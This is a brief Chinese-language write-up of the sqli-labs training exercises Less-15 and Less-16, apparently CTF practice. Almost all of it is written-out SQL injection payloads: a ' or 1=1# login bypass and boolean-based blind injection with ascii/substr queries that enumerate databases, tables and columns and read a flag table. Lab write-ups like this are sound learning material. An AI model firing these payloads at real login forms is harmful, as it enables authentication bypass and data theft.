?Less-15
uname=1' or 1=1#&passwd=1&submit=Submit
单引号的万能密码可以,双引号不行,所以用单引号闭合
正确和错误有区分但不会回显
所以可以用布尔盲注
用时间盲注测试时不知道为什么会一直加载,不止三秒
uname=1' or ascii(left(database(),1))=115#&passwd=1&submit=Submit
?查数据库
uname=1' or (ascii(substr((select database()) ,1,1))) = 115 #&passwd=' or 1=1 #&submit=Submituname=1' or (ascii(substr((select database()) ,2,1)))=101 #&passwd=' or 1=1 #&submit=Submit依次可查出是security
再查其他的数据库
uname=1' or (ascii(substr((select schema_name from information_schema.schemata limit 0,1) ,1,1)))=99 #&passwd=' or 1=1 #&submit=Submit查表名
uname=1' or (ascii(substr((select table_name from information_schema.tables where table_schema='ctftraining' limit 0,1) ,1,1)))=102 #&passwd=' or 1=1 #&submit=Submit?查列名
uname=1' or (ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1) ,1,1)))=102 #&passwd=' or 1=1 #&submit=Submit?查数据
uname=1' or (ascii(substr((select group_concat(flag) from ctftraining.flag limit 0,1) ,1,1)))=102 #&passwd=' or 1=1 #&submit=SubmitLess-16
uname=1") or 1=1#&passwd=' or 1=1&submit=Submit其他的和15题一样